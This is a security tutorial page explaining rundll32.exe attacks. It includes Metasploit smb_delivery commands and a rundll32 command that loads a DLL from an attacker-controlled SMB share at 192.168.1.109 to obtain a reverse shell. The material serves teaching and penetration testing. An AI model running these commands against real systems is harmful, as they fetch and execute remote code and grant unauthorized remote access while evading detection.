Home Whiteboard Practice Code Graphing Calculator Online Compilers Articles Tools
Tutorials Courses Jobs

Rundll32.exe Attack

Computer Network Computer Programming Safe & Security

A Rundll32.exe attack exploits the legitimate Windows utility rundll32.exe to execute malicious Dynamic Link Libraries (DLLs). Rundll32.exe is a Windows system process that allows programs to invoke functions from DLL files, making it an attractive target for attackers who can abuse this functionality to run malicious code while appearing as legitimate system activity.

Attackers leverage rundll32.exe because it can load and execute code from DLL files, and security tools often trust this legitimate Windows process. This technique is commonly used in penetration testing and malware campaigns to bypass security controls and establish remote access to target systems.

How Rundll32.exe Attacks Work

The attack process involves creating a malicious DLL file and using rundll32.exe to execute it on the target system. The malicious DLL typically contains a payload that establishes a reverse shell or downloads additional malware. Since rundll32.exe is a trusted Windows process, many security solutions may not flag its execution as suspicious.

Rundll32.exe Attack Flow Attacker Creates malicious DLL SMB Share Hosts DLL file Victim System Executes rundll32.exe Payload Executes rundll32.exe \attacker_ip\share\malicious.dll,EntryPoint

Launch Rundll32 Attack via SMB

The SMB Delivery module in Metasploit generates malicious DLL files and serves them via an SMB server. This module provides commands to retrieve and execute payloads remotely, making it effective for penetration testing scenarios.

Generate DLL Payload

To create and serve a malicious DLL payload using Metasploit:

use exploit/windows/smb/smb_delivery
set srvhost 192.168.1.109
exploit

Once the SMB server is running and hosting the malicious DLL, execute the following command on the target Windows machine to trigger the payload:

rundll32.exe \192.168.1.109\vabFG\test.dll,0

This command instructs rundll32.exe to load the DLL from the attacker's SMB share and execute the function at ordinal position 0. Upon successful execution, the attacker will receive a reverse shell connection from the victim machine.

Key Attack Characteristics

Aspect Description
Stealth Uses legitimate Windows process to avoid detection
Delivery Method SMB shares, web downloads, or local file placement
Payload Types Reverse shells, credential stealers, persistence mechanisms
Detection Difficulty High, due to legitimate process usage

Conclusion

Rundll32.exe attacks exploit the legitimate Windows utility to execute malicious DLL files while evading security detection. This technique demonstrates how attackers can abuse trusted system processes to deliver payloads and establish unauthorized access to target systems.

Updated on: 2026-03-16T23:36:12+05:30

734 Views

Kickstart Your Career

Get certified by completing the course

Get Started
Advertisements